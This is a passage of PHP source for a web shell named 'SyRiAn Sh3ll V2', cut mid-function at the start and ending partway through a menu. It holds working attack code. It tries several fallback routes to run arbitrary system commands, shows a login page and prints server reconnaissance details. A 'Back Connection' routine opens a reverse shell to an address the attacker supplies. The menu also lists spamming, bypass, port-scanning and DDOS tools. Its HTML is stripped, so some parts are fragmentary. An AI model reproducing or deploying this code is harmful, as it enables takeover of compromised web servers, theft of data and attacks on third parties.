win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = "0ff"; } else { $mag="0N"; } return $mag; } function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = "NONE"; } return $disfun; } $uname= @php_uname(); function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; } function Logout() { print""; } if($_GET['id']== 'logout') { Logout(); } # ---------------------------------------# # CSS # #----------------------------------------# echo " SyRiAn Sh3ll ~ V2~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { echo ""; } # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user and $_POST[passwrd]==$pass) { print''; } else { if($_POST[usrname]) { print''; } echo '

SyRiAn Sh3ll
UserName :

Password :

'; exit; } } } # ---------------------------------------# # Operating System # #----------------------------------------# $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; # ---------------------------------------# # Server Dir # #----------------------------------------# if(empty($dir)) { $opsy = getenv('OS'); if(empty($opsy)) { $opsy = php_uname(); } if(empty($opsy)) { $opsy ="-"; $os = "Linux"; } else { if(eregi("^Windows",$opsy)) { $os = "Windows"; } else { $os = "Linux"; } } } if($os == "Linux") { $pwd = @Exe("pwd"); } elseif($os == "Windows") { $pwd = @Exe("cd");} if(empty($pwd)) { $pwd = getcwd(); } # ---------------------------------------# # Header # #----------------------------------------# $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V2

  [Main] [Scripts Hacking] [Spamming] [Bypass] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ". GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search] [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # SuiCide # #----------------------------------------# if($_GET['id'] == 100) { echo ""; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage' ) { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Change Directory
  Edit File
  Get File
  Server ShortCut
  CGI Perl
  Change Mode

  Back Connection

"; if($_POST['backConnectionSubmit']) { $ip = $_POST['yourip']; $port = $_POST['yourport']; @set_time_limit (0); $VERSION = "1.0"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("[-] WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("[-] Error Can't Connect !! "); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("[+] Connected Successfully With $ip:$port"); printit("[+] SyRiAn Sh3ll V2"); while (1) { if (feof($sock)) { printit("[-] ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("[-] ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } } echo "
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files
  Encryption
  Metasploit Connection
  Show Users
  Ports Scanner
  ACP Finder
  DDOS Attacker
  Config Finder